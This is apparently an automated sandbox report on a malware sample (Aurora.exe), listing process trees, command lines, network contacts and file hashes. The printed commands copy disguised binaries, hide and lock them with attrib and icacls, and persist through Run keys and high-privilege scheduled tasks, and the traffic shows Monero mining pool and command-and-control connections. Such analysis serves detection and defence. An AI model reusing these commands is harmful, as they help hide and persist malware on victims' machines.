Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4000 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe
PID 4000 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe
PID 5000 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe C:\Windows\system32\cmd.exe
PID 5000 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe C:\Windows\system32\cmd.exe
PID 4000 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe
PID 4000 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe
PID 4000 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe
PID 1844 wrote to memory of 3960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1844 wrote to memory of 3960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4000 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe
PID 4000 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe
PID 4000 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe
PID 4000 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe
PID 4000 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe
PID 3960 wrote to memory of 4868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\PING.EXE
PID 3960 wrote to memory of 4868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\PING.EXE
PID 2680 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\SysWOW64\cmd.exe
PID 2680 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\SysWOW64\cmd.exe
PID 2680 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\SysWOW64\cmd.exe
PID 2680 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2220 wrote to memory of 5100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2220 wrote to memory of 5100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2220 wrote to memory of 5100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3960 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3960 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3960 wrote to memory of 1580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3960 wrote to memory of 1580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3960 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3960 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1036 wrote to memory of 4536 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Msedge.exe
PID 1036 wrote to memory of 4536 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Msedge.exe
PID 3980 wrote to memory of 3152 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3980 wrote to memory of 3152 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3980 wrote to memory of 4628 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3980 wrote to memory of 4628 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3980 wrote to memory of 4392 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3980 wrote to memory of 4392 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3980 wrote to memory of 640 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3980 wrote to memory of 640 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4868 wrote to memory of 3496 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4868 wrote to memory of 3496 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4868 wrote to memory of 3608 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4868 wrote to memory of 3608 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4868 wrote to memory of 4896 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4868 wrote to memory of 4896 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4868 wrote to memory of 2244 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4868 wrote to memory of 2244 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 724 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe C:\Windows\System32\conhost.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Aurora.exe

"C:\Users\Admin\AppData\Local\Temp\Aurora.exe"

C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe

"C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd /Q /C " ping localhost -n 1 && copy "C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" "C:\Users\Admin\AppData\Local\Msedge.exe" && attrib +r +h +a "C:\Users\Admin\AppData\Local\Msedge.exe" && icacls "C:\Users\Admin\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) && del "C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" && cmd /C "start "C:\Users\Admin\AppData\Local\Msedge.exe" && exit" && && exit "

C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe

"C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe"

C:\Windows\system32\cmd.exe

cmd /Q /C " ping localhost -n 1 && copy "C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" "C:\Users\Admin\AppData\Local\Msedge.exe" && attrib +r +h +a "C:\Users\Admin\AppData\Local\Msedge.exe" && icacls "C:\Users\Admin\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) && del "C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" && cmd /C "start "C:\Users\Admin\AppData\Local\Msedge.exe"

C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe"

C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe

"C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe"

C:\Windows\system32\PING.EXE

ping localhost -n 1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate' -Value '"C:\Users\Admin\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \OneDriveUpdate /tr "C:\Users\Admin\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \OneDriveUpdate /tr "C:\Users\Admin\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\system32\attrib.exe

attrib +r +h +a "C:\Users\Admin\AppData\Local\Msedge.exe"

C:\Windows\system32\icacls.exe

icacls "C:\Users\Admin\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA)

C:\Windows\system32\cmd.exe

cmd /C "start "C:\Users\Admin\AppData\Local\Msedge.exe

C:\Users\Admin\AppData\Local\Msedge.exe

C:\Users\Admin\AppData\Local\Msedge.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#npnsokoe#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "ConsoleWindowsHost"

C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe

C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#npnsokoe#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
GB 154.81.220.233:28105 tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 auroraforge.art udp
US 192.64.119.108:55326 auroraforge.art tcp
GB 154.81.220.233:28105 tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
GB 154.81.220.233:28105 tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
GB 154.81.220.233:28105 tcp
US 8.8.8.8:53 thesirenmika.com udp
CN 123.123.123.123:55713 thesirenmika.com tcp
US 8.8.8.8:53 xmr-us-east1.nanopool.org udp
CA 51.222.106.253:14444 xmr-us-east1.nanopool.org tcp
GB 154.81.220.233:28105 tcp
US 8.8.8.8:53 253.106.222.51.in-addr.arpa udp
GB 154.81.220.233:28105 tcp
GB 154.81.220.233:28105 tcp
US 8.8.8.8:53 101.58.20.217.in-addr.arpa udp
US 192.64.119.108:55326 auroraforge.art tcp
GB 154.81.220.233:28105 tcp
GB 154.81.220.233:28105 tcp
GB 154.81.220.233:28105 tcp
CN 123.123.123.123:55713 thesirenmika.com tcp
GB 154.81.220.233:28105 tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
GB 154.81.220.233:28105 tcp
GB 154.81.220.233:28105 tcp
US 192.64.119.108:55326 auroraforge.art tcp
GB 154.81.220.233:28105 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
GB 154.81.220.233:28105 tcp
GB 154.81.220.233:28105 tcp
GB 154.81.220.233:28105 tcp
CN 123.123.123.123:55713 thesirenmika.com tcp
GB 154.81.220.233:28105 tcp
GB 154.81.220.233:28105 tcp

Files

memory/4000-0-0x0000000000FA0000-0x0000000002A6A000-memory.dmp

memory/4000-1-0x00000000768B0000-0x00000000768B1000-memory.dmp

memory/4000-6-0x0000000076890000-0x0000000076980000-memory.dmp

memory/4000-5-0x0000000076890000-0x0000000076980000-memory.dmp

memory/4000-4-0x0000000076890000-0x0000000076980000-memory.dmp

memory/4000-3-0x0000000076890000-0x0000000076980000-memory.dmp

memory/4000-2-0x0000000076890000-0x0000000076980000-memory.dmp

memory/4000-7-0x0000000076890000-0x0000000076980000-memory.dmp

memory/4000-10-0x0000000076890000-0x0000000076980000-memory.dmp

C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe

MD5 65f0a85c4b056d6bcee60c49e2372e35
SHA1 6af820a2030950617bf150777af4a43a06a17184
SHA256 d64768ea74224057220bff451504b6128ddfb6161617b668626c490c84b3ae8e
SHA512 7a50bd0b3908f830494b2bff13a051ba0cdc7900934dbf8a62616f6d29b914f05f8029bbcc429a095254ebb6ab2a2d92c05dd6aebf57e34cde20f152243df383

C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe

MD5 c9a9d471428a5f92068c0823e6454254
SHA1 8b8ee8612b9b8bfbb165b3a8ca0d4a377b589dd2
SHA256 b0ffaa8c7d8fe1e804afc87e6f7659483c69d421911ddbfc410270011b91bfb5
SHA512 ca34022e99a48639fb3566ec4eb901a2f91121aee6a1f1bc601492dd94387873afc8af499aefed8d644aef8f564ca46a12ea40176da7f8d7b4e60f4b505ac8af

C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe

MD5 3b4f58cd4bca7274be25e885be00798b
SHA1 eb57c281d8324a1079db97c9da43483a65debbed
SHA256 a6832546e1d261c33deea58e1cbb8a391af91628b130454d55aef3e292862d80
SHA512 dc909730b2feacba3c14c98a2b443d5c12dfd74ce74db53cf7e564e01707ac365811e4d3b95c0cefe2b87ebd1b074fb4a395360911c3d11de4fa8957e9bad121

C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe

MD5 b9fc8581b52abfc6b563da731438e27d
SHA1 43111fe9b307c850a379fe2d64d279e994680de3
SHA256 e03debe75b2f4f4c937c50773064b9a692b262bfce4472e67900edf3f7726058
SHA512 c62540e73870caf9a93fbc2396ac99867f8f6e87661240d7642022130008bdb769954f1e8a58d13698172e62cc5b7d44a73b2f1d999db47822eb294c629436a5

memory/2680-51-0x00000000006A0000-0x00000000009CE000-memory.dmp

memory/4972-52-0x0000000000450000-0x000000000046E000-memory.dmp

memory/4972-54-0x0000000005400000-0x0000000005A18000-memory.dmp

memory/2680-53-0x0000000005730000-0x0000000005CD4000-memory.dmp

memory/4972-55-0x0000000004CD0000-0x0000000004CE2000-memory.dmp

memory/4972-57-0x0000000004D30000-0x0000000004D6C000-memory.dmp

memory/2128-60-0x0000000000400000-0x0000000000724000-memory.dmp

memory/2912-62-0x0000000005920000-0x0000000005F48000-memory.dmp

memory/4972-59-0x0000000004D70000-0x0000000004DBC000-memory.dmp

memory/2912-58-0x0000000002EA0000-0x0000000002ED6000-memory.dmp

memory/2128-63-0x00000000058F0000-0x0000000005982000-memory.dmp

memory/4972-64-0x0000000004FE0000-0x00000000050EA000-memory.dmp

memory/2128-65-0x00000000059A0000-0x00000000059AA000-memory.dmp

memory/4000-70-0x0000000076890000-0x0000000076980000-memory.dmp

memory/2912-71-0x0000000006130000-0x0000000006196000-memory.dmp

memory/2912-69-0x00000000060C0000-0x0000000006126000-memory.dmp

memory/2912-68-0x00000000058F0000-0x0000000005912000-memory.dmp

memory/2912-72-0x00000000061C0000-0x0000000006514000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4vdao4e2.35k.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4000-73-0x0000000000FA0000-0x0000000002A6A000-memory.dmp

memory/2912-83-0x00000000067B0000-0x00000000067CE000-memory.dmp

memory/2912-99-0x0000000006D60000-0x0000000006D7E000-memory.dmp

memory/2912-88-0x0000000006D80000-0x0000000006DB2000-memory.dmp

memory/2912-100-0x0000000007990000-0x0000000007A33000-memory.dmp

memory/2912-89-0x000000006EC60000-0x000000006ECAC000-memory.dmp

memory/2128-101-0x00000000063B0000-0x0000000006400000-memory.dmp

memory/2128-102-0x0000000006600000-0x00000000066B2000-memory.dmp

memory/2912-104-0x0000000007AE0000-0x0000000007AFA000-memory.dmp

memory/2912-103-0x0000000008120000-0x000000000879A000-memory.dmp

memory/2912-105-0x0000000007B50000-0x0000000007B5A000-memory.dmp

memory/2912-106-0x0000000007D60000-0x0000000007DF6000-memory.dmp

memory/2912-107-0x0000000007CE0000-0x0000000007CF1000-memory.dmp

memory/2912-108-0x0000000007D10000-0x0000000007D1E000-memory.dmp

memory/2912-109-0x0000000007D20000-0x0000000007D34000-memory.dmp

memory/2912-110-0x0000000007E20000-0x0000000007E3A000-memory.dmp

memory/2912-111-0x0000000007E00000-0x0000000007E08000-memory.dmp

memory/2912-112-0x0000000007E40000-0x0000000007E62000-memory.dmp

memory/4220-115-0x00007FF77CAB0000-0x00007FF77D04A000-memory.dmp

memory/3588-116-0x0000013727BC0000-0x0000013727BE2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ee530ff1ea089a500333b8acc9174f3f
SHA1 f3b81059c86f6ab0e70ea46dda56c3775f6dd028
SHA256 4a3023ef9663912f4f7b16ea642c54a4de921b7f1ba7982550e39ed90b29621f
SHA512 045623986ccc8d037cdde5106c9c9a674bf85e6d54854ed80c0992779e99472c1fc9784ac8e5fa50e4849b25eb6473cc91e9ea524bdddc3ad8ec62f7fb60a86e

memory/4220-131-0x00007FF77CAB0000-0x00007FF77D04A000-memory.dmp

memory/724-133-0x00007FF6CE8C0000-0x00007FF6CEE5A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 fee026663fcb662152188784794028ee
SHA1 3c02a26a9cb16648fad85c6477b68ced3cb0cb45
SHA256 dbd4136bc342e3e92902ec3a30d165452c82997a7ae24ac90775e42d88959e6b
SHA512 7b12bd5c8fc4356b9123d6586b4980cf76012663b41c0dab6f6f21567e2f4005c5bcea2cc2158d157e4f801a281f3e04bad3774cddb3122db309ccf662184bd6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d95b08252ed624f6d91b46523f110f29
SHA1 17577997bc1fb5d3fbe59be84013165534415dc3
